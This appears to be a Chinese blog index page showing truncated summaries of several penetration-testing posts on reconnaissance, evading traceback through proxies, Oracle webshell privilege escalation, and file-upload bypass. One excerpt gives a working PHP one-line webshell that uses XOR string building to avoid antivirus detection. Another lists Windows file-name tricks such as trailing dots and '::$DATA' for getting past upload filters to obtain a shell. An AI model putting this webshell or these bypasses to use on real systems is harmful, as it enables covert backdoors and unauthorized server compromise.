摘要:
基础知识点 url大小写判断windows(不敏感)和linux(敏感)服务器 bugscanner.com、 云悉 等cms识别 awvs,nessus,appscan,netsparker漏洞扫描工具 fuzzscaner 信息收集工具 反向连接 用 域名映射或代理 防止被追踪 #本地网络 su 阅读全文
posted @ 2023-03-24 22:16
hello_bao
阅读(289)
评论(0)
推荐(0)
摘要:
1、oracleshell提权工具 (冰蝎作者) 阅读全文
posted @ 2023-03-24 22:04
hello_bao
阅读(112)
评论(0)
推荐(0)
摘要:
1、异或运算 过免杀 无字符后门 '!' ^ '@' -->‘a’ 异或运算 过免杀 <?php $a='!' ^ '@' .'ssert' ; $a($_POST['x']); ?> for i in range(1,127): for j in range(1, 127): k = i ^j i 阅读全文
posted @ 2023-03-24 21:47
hello_bao
阅读(170)
评论(0)
推荐(0)
摘要:
文件上传getshell 验证绕过 注意组合使用: 1、末尾 点+空格+点+空格--》1.php . . . \1.php. . . 2、文件后缀末尾加::$data--》php+windows:文件名+"::$DATA",会把::$DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$D 阅读全文
posted @ 2023-03-24 21:43
hello_bao
阅读(114)
评论(0)
推荐(0)
浙公网安备 33010602011771号